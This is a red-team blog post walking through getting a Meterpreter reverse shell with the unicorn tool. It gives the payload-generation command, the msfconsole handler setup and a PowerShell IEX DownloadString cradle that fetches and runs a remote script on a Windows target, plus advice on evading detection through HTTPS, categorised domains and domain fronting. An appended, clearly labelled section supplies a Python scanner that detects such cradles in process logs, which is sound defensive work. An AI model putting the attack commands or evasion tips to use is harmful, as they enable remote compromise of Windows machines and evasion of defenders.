Payloads with Unicorn
I want to document some of my red team experiences, starting with how I got a shell recently.
First, download the latest version of unicorn from here:
cd unicorn
python unicorn.py windows/meterpreter/reverse_http [c2ip] 443
The above command will create two files: "powershell_attack.txt" and "unicorn.rc".
Then run:
msfconsole -r unicorn.rc
This does the magic; your reverse handler should then be listening at http://0.0.0.0:443
At this point you may want to navigate to the above URL and verify that the handler is responding. Note: take care not to expose the HTTP site; use HTTPS where you can, and also use categorised domains, domain fronting, etc. Pick your setup according to the business case.
Now serve the payload; again, take care in how you serve it (use TLS/SSL):
sudo python -m SimpleHTTPServer 4443
Then run the following on the Windows machine:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://0.0.0.0:4443/dd.ps1')"
Note: do not use plain HTTP for payload serving; it is easily picked up. Also use an HTTPS reverse shell payload.
I will post how this can be achieved later.
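The note above about plain HTTP being "easily picked up" is worth seeing from the blue team side. The following is an added example, not code from the original post or from the unicorn project: a small Python scanner that runs over constructed process-creation command lines (the shape Sysmon Event ID 1 or Windows Security 4688 records) and flags the IEX-plus-DownloadString cradle, a cleartext http:// fetch, and the usual hidden-window / execution-policy-bypass switches. The sample events, PIDs and user names are made up for the example.

```python
import re

# Constructed sample process-creation events, shaped like the CommandLine field
# of a Sysmon Event ID 1 or Windows Security 4688 record. They are invented for
# this example and are not telemetry from the post.
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "CORP\\jdoe",
     "cmdline": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://0.0.0.0:4443/dd.ps1')\""},
    {"pid": 4188, "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"iex ((new-object net.webclient).downloadstring('https://example.invalid/x.ps1'))\""},
    {"pid": 4212, "user": "CORP\\svc_backup",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"pid": 4300, "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp"},
]

# Detection rules as (name, compiled pattern). The cradle rule needs both an
# in-memory execution verb (IEX / Invoke-Expression) and a download primitive,
# in either order, so a lone Invoke-WebRequest in an admin script does not fire.
RULES = [
    ("download_cradle", re.compile(
        r"(?is)\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient)\b"
        r"|\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b.*\b(iex|invoke-expression)\b")),
    # A script pulled over cleartext HTTP is visible on the wire and in the
    # command line; this is the "easily picked up" case from the post.
    ("cleartext_http_fetch", re.compile(r"(?i)\bhttp://[^\s'\")]+")),
    # Switches that hide the console or disable script policy are rare in
    # legitimate automation and raise the score when paired with a cradle.
    ("hidden_or_bypass", re.compile(
        r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|enc(?:odedcommand)?\b)")),
]


def scan_event(event):
    """Return the names of the rules that fire on one event's command line."""
    cmd = event["cmdline"]
    return [name for name, pattern in RULES if pattern.search(cmd)]


def scan_events(events):
    """Return {pid: [rule names]} for every event that fires at least one rule.

    The number of rules hit is a crude severity; download_cradle on its own is
    already worth an analyst's attention.
    """
    findings = {}
    for event in events:
        hits = scan_event(event)
        if hits:
            findings[event["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan_events(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(hits)}")
```

Run it as-is to see the two cradle events flagged and the two benign PowerShell invocations left alone. In a real deployment the same patterns belong in the SIEM rule that consumes 4688 / Sysmon command lines (with command-line auditing enabled, which is off by default), and the cleartext_http_fetch rule is the one that moving to HTTPS, as the post advises, defeats; the cradle rule still fires regardless of the transport.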